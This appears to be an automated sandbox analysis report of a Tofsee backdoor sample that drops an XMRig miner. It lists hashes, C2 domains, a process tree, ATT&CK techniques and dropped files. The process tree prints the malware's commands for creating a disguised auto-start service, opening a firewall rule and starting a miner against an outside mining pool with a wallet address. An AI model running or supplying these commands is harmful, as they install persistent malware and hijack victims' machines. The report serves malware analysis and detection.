Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    20-01-2022 03:50

General

  • Target

    91afd4d395681d7acb2ca45e7a1817b3c828fad2e28e1c0ceaebb152176b20e1.exe

  • Size

    275KB

  • MD5

    063b2c711a6b8465d2a41d4d40f2ca44

  • SHA1

    3fd50df7aaba9b0d0bdbf6562edb27ddbf9c669d

  • SHA256

    91afd4d395681d7acb2ca45e7a1817b3c828fad2e28e1c0ceaebb152176b20e1

  • SHA512

    ccb06b5c65430058b8a59e707097fae94cd5a9318d031f01e5c27150ef6a53fb6c5778c238aa548cc52337c9b1a476c9f2d65d8c7854ac2bc53eab93584ae963

Malware Config

Extracted

Family

tofsee

C2

patmushta.info

ovicrush.cn

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\91afd4d395681d7acb2ca45e7a1817b3c828fad2e28e1c0ceaebb152176b20e1.exe
    "C:\Users\Admin\AppData\Local\Temp\91afd4d395681d7acb2ca45e7a1817b3c828fad2e28e1c0ceaebb152176b20e1.exe"
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1328
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\nhlvphui\
      PID:2320
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\xqytjrrr.exe" C:\Windows\SysWOW64\nhlvphui\
      PID:3804
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" create nhlvphui binPath= "C:\Windows\SysWOW64\nhlvphui\xqytjrrr.exe /d\"C:\Users\Admin\AppData\Local\Temp\91afd4d395681d7acb2ca45e7a1817b3c828fad2e28e1c0ceaebb152176b20e1.exe\"" type= own start= auto DisplayName= "wifi support"
      PID:3956
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" description nhlvphui "wifi internet conection"
      PID:3660
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" start nhlvphui
      PID:3472
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
      PID:3924
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 664
      • Program crash
      PID:1396
  • C:\Windows\System32\WaaSMedicAgent.exe
    C:\Windows\System32\WaaSMedicAgent.exe 75bff49e4ae5a832d80fac94aca4e140 Lvb1gL9tqkCSSd897/dWMA.0.1.0.0.0
    • Modifies data under HKEY_USERS
    PID:2644
  • C:\Windows\SysWOW64\nhlvphui\xqytjrrr.exe
    C:\Windows\SysWOW64\nhlvphui\xqytjrrr.exe /d"C:\Users\Admin\AppData\Local\Temp\91afd4d395681d7acb2ca45e7a1817b3c828fad2e28e1c0ceaebb152176b20e1.exe"
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3820
    • C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:3516
      • C:\Windows\SysWOW64\svchost.exe
        svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
        • Suspicious use of AdjustPrivilegeToken
        PID:4000
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 516
      • Program crash
      PID:4092
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 1328 -ip 1328
    PID:1900
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3820 -ip 3820
    PID:2280
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService
    • Suspicious use of AdjustPrivilegeToken
    PID:2188
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
    PID:3704
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService
    • Suspicious use of AdjustPrivilegeToken
    PID:1396

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence
    New Service (T1050): 1
    Modify Existing Service (T1031): 1
    Registry Run Keys / Startup Folder (T1060): 1
  • Privilege Escalation
    New Service (T1050): 1
  • Defense Evasion
    Modify Registry (T1112): 1
  • Discovery
    Query Registry (T1012): 1
    System Information Discovery (T1082): 2


Downloads

  • C:\Users\Admin\AppData\Local\Temp\xqytjrrr.exe
    MD5
    90d00271f52ffaadc6152f9d4241cf3e
    SHA1
    8a8bea803be4dbc5b5c243b6b54c74196e13df1f
    SHA256
    e9b07323df2e6b7753ab00544e9225a4d02855db9db853003fe2e0c2f2db7ddd
    SHA512
    37fe6d12115791d9f41e59d12d4ef5772b012a611a30d3039cf918be664a95a0981cf0871f2599c409eaa66c67c37dedd1adc11e5313e7d75a2919dffcce76d2

  • C:\Windows\SysWOW64\nhlvphui\xqytjrrr.exe
    MD5
    90d00271f52ffaadc6152f9d4241cf3e
    SHA1
    8a8bea803be4dbc5b5c243b6b54c74196e13df1f
    SHA256
    e9b07323df2e6b7753ab00544e9225a4d02855db9db853003fe2e0c2f2db7ddd
    SHA512
    37fe6d12115791d9f41e59d12d4ef5772b012a611a30d3039cf918be664a95a0981cf0871f2599c409eaa66c67c37dedd1adc11e5313e7d75a2919dffcce76d2

  • memory/1328-133-0x00000000009D0000-0x00000000009DD000-memory.dmp
    Filesize
    52KB

  • memory/1328-134-0x0000000000A00000-0x0000000000A13000-memory.dmp
    Filesize
    76KB

  • memory/1328-135-0x0000000000400000-0x000000000044C000-memory.dmp
    Filesize
    304KB

  • memory/3516-146-0x0000000003F80000-0x0000000003F90000-memory.dmp
    Filesize
    64KB

  • memory/3516-142-0x0000000004E00000-0x000000000500F000-memory.dmp
    Filesize
    2.1MB

  • memory/3516-144-0x0000000003F70000-0x0000000003F76000-memory.dmp
    Filesize
    24KB

  • memory/3516-138-0x0000000002AF0000-0x0000000002B05000-memory.dmp
    Filesize
    84KB

  • memory/3516-148-0x0000000003FD0000-0x0000000003FD5000-memory.dmp
    Filesize
    20KB

  • memory/3516-150-0x0000000009D00000-0x000000000A10B000-memory.dmp
    Filesize
    4.0MB

  • memory/3516-152-0x0000000003FE0000-0x0000000003FE7000-memory.dmp
    Filesize
    28KB

  • memory/3820-141-0x0000000000400000-0x000000000044C000-memory.dmp
    Filesize
    304KB

  • memory/4000-154-0x0000000002CF0000-0x0000000002DE1000-memory.dmp
    Filesize
    964KB

  • memory/4000-158-0x0000000002CF0000-0x0000000002DE1000-memory.dmp
    Filesize
    964KB